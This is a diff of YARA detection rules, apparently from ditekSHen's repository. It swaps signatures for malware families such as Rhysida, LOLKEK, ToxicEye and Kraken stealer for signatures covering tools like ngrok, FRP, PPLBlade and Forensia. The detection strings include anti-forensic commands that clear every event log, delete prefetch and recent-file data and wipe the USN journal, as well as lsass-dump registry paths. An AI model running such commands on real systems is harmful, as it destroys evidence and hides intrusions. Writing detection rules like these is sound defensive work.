-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10773-L10786"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1455-L1471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d5625c2cd7e3a51c2fce9948e691ff2d1b7cf85083708790f89e15c6522059b"
+		logic_hash = "c60637177114d369af9c3e96689811845ce1c1dfde8f7f971c4de21439564b4b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.RookIE-Downloader"
 
 	strings:
-		$s1 = "shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}" fullword ascii
-		$s2 = "taskkill /f /im hh.exe" fullword ascii
-		$s3 = "RookIE/1.0" fullword ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" fullword ascii
-		$s5 = "#32770" fullword ascii
+		$x1 = "NgrokSharp" fullword wide
+		$x2 = "/entvex/NgrokSharp" ascii
+		$s1 = "start --none -region" wide
+		$s2 = "startTunnelDto" fullword wide
+		$s3 = "/tunnels/" fullword wide
+		$s4 = "<StartNgrok" ascii
+		$s5 = "INgrokManager" ascii
+		$s6 = "_tunnel_name" ascii
+		$s7 = "_ngrokDownloadUrl" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Fiber : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ngrokgo : FILE
 {
 	meta:
-		description = "Detects Fiber .NET injector"
+		description = "Detects Go implementation variant for Ngrok"
 		author = "ditekSHen"
-		id = "0e562e2e-cb91-5acf-bb8f-5e7e7d971a3d"
+		id = "b11f67c5-846d-57b2-8edc-521b2dc77503"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10788-L10824"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1473-L1488"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd6c2c02272fe59c8d7de533197f15d94b5532d32875f01e3e4bd52506456a34"
+		logic_hash = "4ec151661e3af922aba202c68392a2af17e2c4ed25a71a0b5aacc13fbfcc5c53"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "Fiber.dll" fullword ascii
-		$s1 = "-WindowStyle Hidden Copy-Item -Path *.vbs -Destination" wide
-		$s2 = "-WindowStyle Hidden {0} -WindowStyle Hidden Start-Sleep 5; Start-Process {1}" wide
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s4 = "WScript.Shell" fullword wide
-		$s5 = "{0}_{1:N}.lnk" fullword wide
-		$s6 = "notepad.exe,0" fullword wide
-		$i1 = "AppLaunch.exe" fullword wide
-		$i2 = "aspnet_regbrowsers.exe" fullword wide
-		$i3 = "cvtres.exe" fullword wide
-		$i4 = "ilasm.exe" fullword wide
-		$i5 = "jsc.exe" fullword wide
-		$i6 = "MSBuild.exe" fullword wide
-		$i7 = "RegAsm.exe" fullword wide
-		$i8 = "RegSvcs.exe" fullword wide
-		$v1 = "is tampered" wide
-		$v2 = "Debugger Detected" wide
-		$v3 = "RepositoryUrl" ascii
-		$v4 = { 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00
-                74 00 75 00 61 00 6c 00 20 00 00 0b 41 00 6c 00
-                6c 00 6f 00 63 00 00 0d 57 00 72 00 69 00 74 00
-                65 00 20 00 00 11 50 00 72 00 6f 00 63 00 65 00
-                73 00 73 00 20 00 00 0d 4d 00 65 00 6d 00 6f 00
-                72 00 79 00 00 0f 50 00 72 00 6f 00 74 00 65 00
-                63 00 74 00 00 0b 4f 00 70 00 65 00 6e 00 20 00
-                00 0f 50 00 72 00 6f 00 63 00 65 00 73 00 73 00
-                00 0d 43 00 6c 00 6f 00 73 00 65 00 20 00 00 0d
-                48 00 61 00 6e 00 64 00 6c 00 65 00 00 0f 6b 00
-                65 00 72 00 6e 00 65 00 6c }
+		$s1 = "/codegangsta/inject" fullword wide
+		$s2 = "go.ngrok.com/" ascii
+		$s3 = "GetIsNgrokDomain" ascii
+		$s4 = "GetNgrokMetering" ascii
+		$s5 = "*cli.ngrokService" ascii
+		$s6 = "GetAllowNgrokLink" ascii
+		$s7 = "ngrok {{.Name}}{{if .Flags}}" ascii
+		$s8 = "github.com/nikolay-ngrok/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) and 2 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) or ( 2 of ( $s* ) and 6 of ( $i* ) ) or ( 1 of ( $x* ) and 3 of ( $v* ) ) or ( all of ( $v* ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Unknown_Packedloader_01 : FILE
+rule DITEKSHEN_INDICATOR_Tool_Forensia : FILE
 {
 	meta:
-		description = "Detects unknown loader / packer. Observed running LummaStealer"
-		author = "ditekShen"
-		id = "2969090f-dff9-5745-b87d-a031741dd2e0"
+		description = "Detects Forensia anti-forensics tool used for erasing footprints"
+		author = "ditekSHen"
+		id = "bcd05c2e-7ddd-5ce7-a6a7-0659bed38744"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10826-L10845"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1490-L1523"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6fd9075793b55e04c68bb13d21b88741889a9c37a0a9d1a19d895c7b68af4506"
+		logic_hash = "7147eee62df10cd8a6c00ec80c4d1bdb8234a181dd6af81d0580d847f05bd0b6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "Error at hooking API \"%S\"" wide
-		$s2 = "Dumping first %d bytes:" wide
-		$s3 = "Error at initialization of bundled DLL: %s" wide
-		$s4 = "GetMemoryForDLL()" ascii
-		$s5 = "type=activation&code=" ascii
-		$s6 = "activation.php?code=" ascii
-		$s7 = "&hwid=" ascii
-		$s8 = "&hash=" ascii
-		$s9 = "type=deactivation&hash=" ascii
-		$s10 = "deactivation.php?hash=" ascii
-		$s11 = "BANNED" fullword ascii
-		$s12 = "GetAdaptersInfo" ascii
+		$c1 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" ascii
+		$c2 = "del /F /Q C:\\Windows\\Prefetch\\*" ascii
+		$c3 = "del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf" ascii
+		$c4 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*" ascii
+		$c5 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" ascii
+		$c6 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" ascii
+		$c7 = "fsutil.exe usn deletejournal /D C:" ascii
+		$r1 = "\\Memory Management\\PrefetchParameters" wide
+		$r2 = "\\Explorer\\Advanced" wide
+		$r3 = "\\Services\\EventLog" wide
+		$r4 = "\\Shell\\BagMRU" wide
+		$r5 = "\\Control\\FileSystem" wide
+		$r6 = "\\Setup\\VC" wide
+		$s1 = "[LOG] - %s" wide
+		$s2 = "\\forensia\\regedit.hpp" wide
+		$s3 = "NtfsDisableLastAccessUpdate" wide
+		$s4 = "Melting The Executable" wide
+		$s5 = "Sysmon Unloader" wide
+		$s6 = "Rundll32.exe apphelp.dll,ShimFlushCache" ascii
+		$s7 = "\\Debug\\forensia.pdb" ascii
+		$s8 = { 55 00 00 00 aa 00 00 00 92 49 24 00 49 24 92 00
+                24 92 49 00 00 00 00 00 11 00 00 00 22 00 00 00
+                33 00 00 00 44 00 00 00 66 00 00 00 88 00 00 00
+                99 00 00 00 bb 00 00 00 cc 00 00 00 dd 00 00 00
+                ee 00 00 00 ff 00 00 00 6d b6 db 00 b6 db 6d 00
+                db 6d b6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 11 of them
+		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $c* ) and 2 of ( $r* ) ) or ( 4 of ( $r* ) and 2 of ( $c* ) ) or 6 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $r* ) and 1 of ( $c* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_LOLKEK : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Dogzproxy : FILE
 {
 	meta:
-		description = "Detects LOLKEK / GlobeImposter ransowmare"
-		author = "ditekShen"
-		id = "96374c8d-2ef7-5706-a96f-27d60f73f8c1"
+		description = "Detects Dogz proxy tool"
+		author = "ditekSHen"
+		id = "de2a8d26-0e8e-5999-baca-1e43933af866"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10847-L10864"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1525-L1537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "047492f8b7b56c75cfdcc4359de2b02a76cf9591b902171785806987e552995a"
+		logic_hash = "575cfed9cb7979216fd8fd2a05efe5dfece3a9120b4f185c015918337829ed63"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "$Recycle.bin" fullword wide
-		$s2 = "\\\\?\\%c:" fullword wide
-		$s3 = ".MMM" fullword wide
-		$s4 = "ReadMe.txt" fullword wide
-		$s5 = "select * from Win32_ShadowCopy" fullword wide
-		$s6 = "Win32_ShadowCopy.ID='%s'" fullword wide
-		$s7 = "W3CRYPTO LOCKER" ascii
-		$s8 = "http://mmcb" ascii
-		$s9 = "yip.su/2QstD5" ascii
-		$s10 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe" ascii
+		$s1 = "LOGONSERVER=" fullword wide
+		$s2 = "DOGZ_E_" ascii
+		$s3 = "got handshake_id=%d" ascii
+		$s4 = "responser send connect ack" ascii
+		$s5 = "dogz " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Spacecolon : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Fastreverseproxy : FILE
 {
 	meta:
-		description = "Detects Spacecolon ransomware"
+		description = "Detects Fast Reverse Proxy (FRP) tool"
 		author = "ditekSHen"
-		id = "38bde0b6-96a3-5081-b152-c251d7a2ffac"
+		id = "d643cc38-a96c-5353-bb46-ca46ea740e3b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10866-L10886"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1539-L1555"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6e55c45f9df98bc152dadc1ba0953b4b89b5a503af0fc5ba53e12a1aa4f6d28"
+		logic_hash = "c26d9e8833c7055a03a446eb983c7f70f1f18669d009ebc204dda3f0bb6048f7"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "eraseext" fullword ascii
-		$s2 = "*.encrypted" fullword ascii
-		$s3 = "TIMATOMA#" fullword wide
-		$s4 = ".Encrypted" fullword wide
-		$s5 = "Already Encrypted" wide
-		$s6 = "note.txt" fullword wide
-		$s7 = "HOW TO RECOVERY FILES.TXT" fullword wide
-		$s8 = "taskkill /f /im \"" wide nocase
-		$s9 = "\\kill.bat" wide
-		$s10 = "Search cancelled -" fullword wide
-		$s11 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" fullword wide
-		$s12 = "Our TOX ID :" ascii
-		$s13 = "tufhackteam@gmail.com" ascii
+		$x1 = "<title>frp client admin UI</title>" ascii
+		$x2 = "https://github.com/fatedier/frp" ascii
+		$s1 = ").SetLogin" ascii
+		$s2 = ").SetPing" ascii
+		$s3 = ").SetNewWorkConn" ascii
+		$s4 = ").ServeHTTP" ascii
+		$s5 = ").Middleware" ascii
+		$s6 = "frpc proxy config error:" ascii
+		$s7 = "frpc sudp visitor proxy is close" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( all of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Rhysida : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Gogoscan : FILE
 {
 	meta:
-		description = "Detects Rhysida ransomware"
+		description = "Detects GoGo scan tool"
 		author = "ditekSHen"
-		id = "a70bdf19-3b56-5dc0-be74-20a2e85099cc"
+		id = "c24ede04-2971-55f8-8b60-ec3bdca844d7"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10888-L10902"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1557-L1571"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb15f497cdee40b237dfc2aafcde2da95ff2a6f9c162273862ec1a0053269932"
+		logic_hash = "c9fbc98a28c74bf920f5f7d62713834d18b33b5c65483a1bd42e4555764c8346"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "cmd.exe /c reg add \"HK" ascii
-		$s2 = "rundll32.exe user32.dll,UpdatePerUserSystemParameters" fullword ascii
-		$s3 = "C:/Users/Public/bg.jpg" fullword ascii
-		$s4 = "CriticalBreachDetected.pdf" fullword ascii
-		$s5 = "rhysida" ascii
-		$s6 = "cmd.exe /c reg delete \"HKCU\\Cont" ascii
-		$s7 = "Rhysida-" ascii
+		$s1 = "(conn) (scan  (scan) MB in  Value>" ascii
+		$s2 = "sweep sysmontargettelnet" ascii
+		$s3 = "%d bytes(?i) (.*SESS.*?ID)([a-z0-9])([A-Z]+)" ascii
+		$s4 = "prepareForSweep" ascii
+		$s5 = "Scanned %s with %d ports, found %d" ascii
+		$s6 = "/chainreactors/gogo/" ascii
+		$s7 = "Starting task %s ,total ports: %d , mod: %s" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) or ( 3 of ( $s* ) and #s1 > 5 )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Povertystealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Gogoprocdump : FILE
 {
 	meta:
-		description = "Detects PovertyStealer"
+		description = "Detects GoGo (lsass) process dump tool"
 		author = "ditekSHen"
-		id = "a431b82a-81cb-51a9-b3a8-61d71f36a60e"
+		id = "f92845c6-f8ae-50d0-97ea-cfa72051c2de"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10904-L10917"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1573-L1586"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0d8a4dd1f3a9935935878840d19e16d91d240da776f99eb2dd3f12df96efa1d9"
+		logic_hash = "f410882e4c6c8b65e7d3c192cf94bf99d61cf54dc21d80cdf17193b34752c576"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.PovertyStealer"
 
 	strings:
-		$x1 = "Poverty is the parent of crime." ascii
-		$s2 = "OperationSystem: %d:%d:%d" ascii
-		$s3 = "ScreenSize: {lWidth=%d, lHeight=%d}" ascii
-		$s4 = "VideoAdapter #%d: %s" ascii
-		$s5 = "$d.log" fullword wide
+		$s1 = "C:\\temp" ascii
+		$s2 = "gogo" fullword ascii
+		$s3 = "/DumpLsass-master/SilentProcessExit/" ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zone" ascii
+		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\lsass.exe" ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) ) ) or all of them )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Janelarat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Fscan : FILE
 {
 	meta:
-		description = "Detects JanelaRAT"
+		description = "Detects GoGo scan tool"
 		author = "ditekSHen"
-		id = "6a49eeda-307f-5429-aa24-658223360239"
+		id = "3bf73853-15c1-54f7-866a-6a7632e39f19"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10919-L10939"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1588-L1602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f10112b6ffa382b03511e7b6c8757438d5910ee2c24d650d05bb53abfff3860"
+		logic_hash = "b107eb767454c4c084a7237c107c8414bdb03c324902769ac544c5903e346e17"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "<Janela>k__" ascii
-		$x2 = "janela" fullword ascii
-		$x3 = "\\CSHARP\\RAT\\" ascii
-		$s1 = "<SystemInfos>k__" ascii
-		$s2 = "<SendKeepAlives>b__" ascii
-		$s3 = "hookStruct" fullword ascii
-		$s4 = "[^a-zA-Z]" fullword wide
-		$s5 = "GetRecycled" fullword ascii
-		$s6 = "import \"bcl.proto\";" wide
-		$s7 = "\\KL_FINAL\\" ascii
-		$s8 = "\\KL_FASEAVAST" ascii
-		$s9 = "\\kl c++" ascii
-		$s10 = "VisaoAPP" ascii wide
+		$s1 = "fscan version:" ascii
+		$s2 = "Citrix-ConfProxyCitrix-MetaframeCitrix-NetScalerCitrix-XenServerCitrix_Netscaler" ascii
+		$s3 = "(AkamaiGHost)(DESCRIPTION=(Typecho</a>)(^.+)([0-9]+)(confluence.)(dotDefender)" ascii
+		$s4 = "/fscan/" ascii
+		$s5 = "WebScan.CheckDatas" ascii
+		$s6 = "'Exploit.Test" ascii
+		$s7 = "rules:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Qwixxrat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_BURTNCIGAR : FILE
 {
 	meta:
-		description = "Detects QwixxRAT. Uses ToxicEye / TelegramRAT as base (MALWARE_Win_TelegramRAT)"
+		description = "Detects BURNTCIGAR a utility which terminates processes associated with endpoint security software"
 		author = "ditekSHen"
-		id = "0a8f2f6f-aa78-56c2-aca0-d575fbf0b91e"
+		id = "b5260d7e-07ac-5633-b450-e2124cbba65b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10941-L10953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1604-L1616"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e6e44697e393da35215f7835f122cb74b05dbeebb558345d5110d6fbc809f4dd"
+		logic_hash = "4977332a0b20b300a5fc34f0f8d56221f55b66783853306d803e91701cb7e6ec"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.TOOL.BURNTCIGAR"
 
 	strings:
-		$s1 = /Qwixx(\s)?Stealer/ ascii wide
-		$s2 = "discord.gg/UXVFHzTjYe" wide
-		$s3 = "t.me/QwixxTwixx" wide
-		$s4 = "Secret Qwixx" wide
-		$s5 = "\\Qwixx Rat\\" ascii
+		$s1 = "Kill PID =" ascii
+		$s2 = "CreateFile Error =" ascii
+		$s3 = "\\KillAV" ascii
+		$s4 = "DeviceIoControl" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Toxiceye : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Pplblade : FILE
 {
 	meta:
-		description = "Detects ToxicEye / TelegramRAT. Observed used as the basis for many infostealers"
+		description = "Detects PPLBlade Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk"
 		author = "ditekSHen"
-		id = "99304f11-2444-5864-b174-514bb5bef0f7"
+		id = "60c9b036-51a0-5e08-83de-1f69f62245c3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10955-L10973"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1634-L1658"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee01c107dd295b923801c0d1a77b1534d3a5f2abf8d2cfa93c6786a1b0553504"
+		logic_hash = "da21402b07fcd0358ba630e48ab35956cb7ed8c12836a339c85b2ee5e414543e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "[~] Handling command" wide
-		$s2 = "[?] Sleeping {0}" wide
-		$s3 = "GETPASSWORDS" wide
-		$s4 = "FORKBOMB" wide
-		$s5 = "SENDKEYPRESS" wide
-		$s6 = "KEYLOGGER" wide
-		$s7 = "/ToxicEye/master/TelegramRAT/" wide
-		$s8 = "desktopScreenshot" ascii
-		$s9 = "MeltFile" ascii
-		$s10 = "AutoStealer" ascii
-		$s11 = /\/LimerBoy\/(ToxicEye|Adamantium-Thief|hackpy)/ wide
+		$x1 = "PPLBlade" ascii
+		$x2 = "/PPLBlade/" ascii
+		$x3 = "PPLBlade.exe --mode" ascii
+		$x4 = "PPLBLADE.SYSPPLBlade.dmp" ascii
+		$s1 = "Dump bytes sent at %s:%d. Protocol: %s" ascii
+		$s2 = "Deobfuscated dump saved in file %s" ascii
+		$m1 = "main.WriteDriverOnDisk" ascii
+		$m2 = "main.ProcExpOpenProc" ascii
+		$m3 = "main.miniDumpCallback" ascii
+		$m4 = "main.copyDumpBytes" ascii
+		$m5 = "main.MiniDumpGetBytes" ascii
+		$m6 = "main.SendBytesRaw" ascii
+		$m7 = "main.SendBytesSMB" ascii
+		$m8 = "main.DeobfuscateDump" ascii
+		$m9 = "main.dumpMutex" ascii
+		$m10 = "main.dbghelpDLL" ascii
+		$m11 = "main.miniDumpWriteDump" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and ( 1 of ( $s* ) or 3 of ( $m* ) ) ) or ( all of ( $s* ) and 3 of ( $m* ) ) or ( 7 of ( $m* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Rdpcredsstealerinjector : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpldap : FILE
 {
 	meta:
-		description = "Detects RDP Credentials Stealer injector"
+		description = "Detects SharpLDAP tool written in C# that aims to do enumeration via LDAP queries"
 		author = "ditekSHen"
-		id = "221b7d64-6585-5f3a-bffa-bde05390db73"
+		id = "597e578d-41f0-595e-b92c-0c3676d8b47a"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10994-L11007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1660-L1675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0dfade8dde987f5134158b7c4abc3eaf8dcece86e1ff2ab1da4466da316939a2"
+		logic_hash = "da5db3f2907229dc68e3c6f3351361a4b1fb9fe8afc597c9dfe611f9725c6181"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav1 = "MALWARE.Win.Trojan.RDPCredsStealer-Injector"
 
 	strings:
-		$s1 = "\\APIHookInjectorBin\\" ascii
-		$s2 = "\\RDPCredsStealerDLL.dll" ascii
-		$s3 = "DLL Injected" ascii
-		$s4 = "Code Injected" ascii
-		$s5 = /(OpenProcess|VirtualAllocEx|CreateRemoteThread)\(\) failed:/ fullword ascii
+		$x1 = "SharpLDAP" ascii wide
+		$x2 = "SharpLDAP.pdb" ascii
+		$s1 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" wide
+		$s2 = "(&(servicePrincipalName=*))" wide
+		$s3 = "/Enumerating (Domain|Enterprise|Organizational|Service|Members|Users|Computers)/" wide
+		$s4 = "ListMembers" fullword ascii
+		$s5 = "GroupMembers" fullword ascii
+		$s6 = "get_SamAccountName" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Krakenstealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Pandora : FILE
 {
 	meta:
-		description = "Detect Kraken infostealer"
+		description = "Detects Pandora tool to extract credentials from password managers"
 		author = "ditekSHen"
-		id = "460eb574-99c9-5f78-9efa-7a8808aaaae7"
+		id = "3f71f24b-755f-5967-afbf-04a512bd0a19"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11009-L11030"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1677-L1691"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f15823db706e6e51d8ea58fb026efb49f42234255d2f448614dc645d12648bb"
+		logic_hash = "dd5be3b99b62ec40c242225d9420b9ce299c4f348882b0380289309dfedbc1e8"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		snort = "923828002"
 
 	strings:
-		$x1 = /Kraken(_)?(Stub|Keyboard|Clipboard|GeneratorMachine|PostLogs|Screenshot|Keylogs|Password)/ ascii wide
-		$s1 = /(get|set)_(Clipboard|Keyboard|Screen)Recorder/ fullword ascii
-		$s2 = /Dumping(FileZilla|360_China|Opera|Epic|CocCoc|Thunderbird|Brave)/ fullword ascii
-		$s3 = "ScreenPostData" fullword ascii
-		$s4 = "encrypt_data" fullword ascii
-		$s5 = "KeyboardProc" fullword ascii
-		$s6 = "UploadsKeyboard" fullword ascii
-		$s7 = "ClpUploader" fullword ascii
-		$s8 = "StartKeylogger" fullword ascii
-		$s9 = "ClipoDetectedRemover" fullword ascii
